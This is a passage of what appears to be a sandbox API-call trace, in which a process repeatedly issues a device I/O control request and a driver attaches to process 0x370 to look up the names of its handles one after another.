(Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.348] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.348] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.349] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0140.349] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.349] PsAcquireProcessExitSynchronization () returned 0x0 [0140.349] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.349] ObReferenceObjectByHandle (in: Handle=0x4c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036fb730, HandleInformation=0x0) returned 0x0 [0140.349] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.349] PsReleaseProcessExitSynchronization () returned 0x2 [0140.349] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.349] ObQueryNameString (in: Object=0xfffffa80036fb730, ObjectNameInfo=0xfffffa8002f84044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f84044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.349] ObfDereferenceObject (Object=0xfffffa80036fb730) returned 0x2 [0140.349] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.350] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.350] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.350] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0140.350] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.350] PsAcquireProcessExitSynchronization () returned 0x0 [0140.350] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.350] ObReferenceObjectByHandle (in: Handle=0x4c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036ea070, HandleInformation=0x0) returned 0x0 [0140.350] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.350] PsReleaseProcessExitSynchronization () returned 0x2 [0140.350] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.350] ObQueryNameString (in: Object=0xfffffa80036ea070, ObjectNameInfo=0xfffffa8002f83044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f83044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.350] ObfDereferenceObject (Object=0xfffffa80036ea070) returned 0x2 [0140.350] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.351] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.351] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.351] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0140.351] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.351] PsAcquireProcessExitSynchronization () returned 0x0 [0140.351] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.351] ObReferenceObjectByHandle (in: Handle=0x4d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036e9730, HandleInformation=0x0) returned 0x0 [0140.351] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.352] PsReleaseProcessExitSynchronization () returned 0x2 [0140.352] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.352] ObQueryNameString (in: Object=0xfffffa80036e9730, ObjectNameInfo=0xfffffa8002f7f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f7f044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.352] ObfDereferenceObject (Object=0xfffffa80036e9730) returned 0x2 [0140.352] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.352] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.352] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.352] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0140.352] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.352] PsAcquireProcessExitSynchronization () returned 0x0 [0140.352] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.352] ObReferenceObjectByHandle (in: Handle=0x4d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800375a070, HandleInformation=0x0) returned 0x0 [0140.352] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.353] PsReleaseProcessExitSynchronization () returned 0x2 [0140.353] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.353] ObQueryNameString (in: Object=0xfffffa800375a070, ObjectNameInfo=0xfffffa8002f7d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f7d044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.353] ObfDereferenceObject (Object=0xfffffa800375a070) returned 0x2 [0140.353] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.353] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.353] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.353] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0140.353] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.353] PsAcquireProcessExitSynchronization () returned 0x0 [0140.353] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.353] ObReferenceObjectByHandle (in: Handle=0x4dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800375a300, HandleInformation=0x0) returned 0x0 [0140.353] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.353] PsReleaseProcessExitSynchronization () returned 0x2 [0140.354] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.354] ObQueryNameString (in: Object=0xfffffa800375a300, ObjectNameInfo=0xfffffa8003000044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003000044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.354] ObfDereferenceObject (Object=0xfffffa800375a300) returned 0x2 [0140.354] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.354] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.354] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.354] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0140.354] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.354] PsAcquireProcessExitSynchronization () returned 0x0 [0140.354] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.354] ObReferenceObjectByHandle (in: Handle=0x520, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800387a3c0, HandleInformation=0x0) returned 0x0 [0140.354] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.354] PsReleaseProcessExitSynchronization () returned 0x2 [0140.354] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.354] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ee8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ee8044, ReturnLength=0xfffff88005163508) returned 0x0 [0140.354] ObfDereferenceObject (Object=0xfffffa800387a3c0) returned 0x1 [0140.355] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.355] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.355] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.355] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x100, lpOverlapped=0x0) returned 1 [0140.355] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.355] PsAcquireProcessExitSynchronization () returned 0x0 [0140.355] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.355] ObReferenceObjectByHandle (in: Handle=0x540, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010689f0, HandleInformation=0x0) returned 0x0 [0140.355] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.355] PsReleaseProcessExitSynchronization () returned 0x2 [0140.355] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.355] ObQueryNameString (in: Object=0xfffff8a0010689f0, ObjectNameInfo=0xfffffa8002f73504, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f73504, ReturnLength=0xfffff88005163550) returned 0x0 [0140.355] ObfDereferenceObject (Object=0xfffff8a0010689f0) returned 0x2 [0140.355] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.356] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.356] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.356] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x9a, lpOverlapped=0x0) returned 1 [0140.356] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.356] PsAcquireProcessExitSynchronization () returned 0x0 [0140.356] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.356] ObReferenceObjectByHandle (in: Handle=0x544, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00104cdb0, HandleInformation=0x0) returned 0x0 [0140.356] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.356] PsReleaseProcessExitSynchronization () returned 0x2 [0140.356] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.356] ObQueryNameString (in: Object=0xfffff8a00104cdb0, ObjectNameInfo=0xfffffa8002f7e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f7e044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.356] ObfDereferenceObject (Object=0xfffff8a00104cdb0) returned 0x3 [0140.356] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.356] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.356] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.356] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x9a, lpOverlapped=0x0) returned 1 [0140.357] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.357] PsAcquireProcessExitSynchronization () returned 0x0 [0140.357] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.357] ObReferenceObjectByHandle (in: Handle=0x548, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00104cdb0, HandleInformation=0x0) returned 0x0 [0140.357] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.357] PsReleaseProcessExitSynchronization () returned 0x2 [0140.357] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.357] ObQueryNameString (in: Object=0xfffff8a00104cdb0, ObjectNameInfo=0xfffffa80030c7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c7044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.357] ObfDereferenceObject (Object=0xfffff8a00104cdb0) returned 0x3 [0140.357] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.357] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.357] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.357] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x100, lpOverlapped=0x0) returned 1 [0140.357] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.357] PsAcquireProcessExitSynchronization () returned 0x0 [0140.357] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.358] ObReferenceObjectByHandle (in: Handle=0x550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00104ccf0, HandleInformation=0x0) returned 0x0 [0140.358] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.358] PsReleaseProcessExitSynchronization () returned 0x2 [0140.358] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.358] ObQueryNameString (in: Object=0xfffff8a00104ccf0, ObjectNameInfo=0xfffffa8002f80044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f80044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.358] ObfDereferenceObject (Object=0xfffff8a00104ccf0) returned 0x2 [0140.358] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.358] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.358] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.358] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6c, lpOverlapped=0x0) returned 1 [0140.358] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.358] PsAcquireProcessExitSynchronization () returned 0x0 [0140.358] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.358] ObReferenceObjectByHandle (in: Handle=0x5f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800373b070, HandleInformation=0x0) returned 0x0 [0140.358] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.359] PsReleaseProcessExitSynchronization () returned 0x2 [0140.359] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.359] ObQueryNameString (in: Object=0xfffffa800373b070, ObjectNameInfo=0xfffffa8002f8e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f8e044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.359] ObfDereferenceObject (Object=0xfffffa800373b070) returned 0x3 [0140.359] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.359] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.359] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.359] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0140.359] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.359] PsAcquireProcessExitSynchronization () returned 0x0 [0140.359] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.359] ObReferenceObjectByHandle (in: Handle=0x68c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003943330, HandleInformation=0x0) returned 0x0 [0140.359] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.360] PsReleaseProcessExitSynchronization () returned 0x2 [0140.360] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.360] ObQueryNameString (in: Object=0xfffffa8003943330, ObjectNameInfo=0xfffffa8002f8f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f8f044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.360] ObfDereferenceObject (Object=0xfffffa8003943330) returned 0x2 [0140.360] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.360] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.360] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.360] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0140.360] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.360] PsAcquireProcessExitSynchronization () returned 0x0 [0140.360] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.360] ObReferenceObjectByHandle (in: Handle=0x6f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00126e1d0, HandleInformation=0x0) returned 0x0 [0140.360] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.361] PsReleaseProcessExitSynchronization () returned 0x2 [0140.361] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.361] ObQueryNameString (in: Object=0xfffff8a00126e1d0, ObjectNameInfo=0xfffffa8002f90044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f90044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.361] ObfDereferenceObject (Object=0xfffff8a00126e1d0) returned 0x2 [0140.361] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.361] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.361] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.361] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0140.361] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.361] PsAcquireProcessExitSynchronization () returned 0x0 [0140.361] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.361] ObReferenceObjectByHandle (in: Handle=0x6f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c01b00, HandleInformation=0x0) returned 0x0 [0140.361] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.361] PsReleaseProcessExitSynchronization () returned 0x2 [0140.361] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.361] ObQueryNameString (in: Object=0xfffff8a000c01b00, ObjectNameInfo=0xfffffa8002f91044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f91044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.361] ObfDereferenceObject (Object=0xfffff8a000c01b00) returned 0x3 [0140.361] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.361] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.361] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.362] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0140.362] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.362] PsAcquireProcessExitSynchronization () returned 0x0 [0140.362] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.362] ObReferenceObjectByHandle (in: Handle=0x788, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a1cdd0, HandleInformation=0x0) returned 0x0 [0140.362] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.362] PsReleaseProcessExitSynchronization () returned 0x2 [0140.362] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.362] ObQueryNameString (in: Object=0xfffffa8003a1cdd0, ObjectNameInfo=0xfffffa8002f92044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f92044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.363] ObfDereferenceObject (Object=0xfffffa8003a1cdd0) returned 0x1 [0140.363] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.363] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.363] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.363] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0140.363] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.363] PsAcquireProcessExitSynchronization () returned 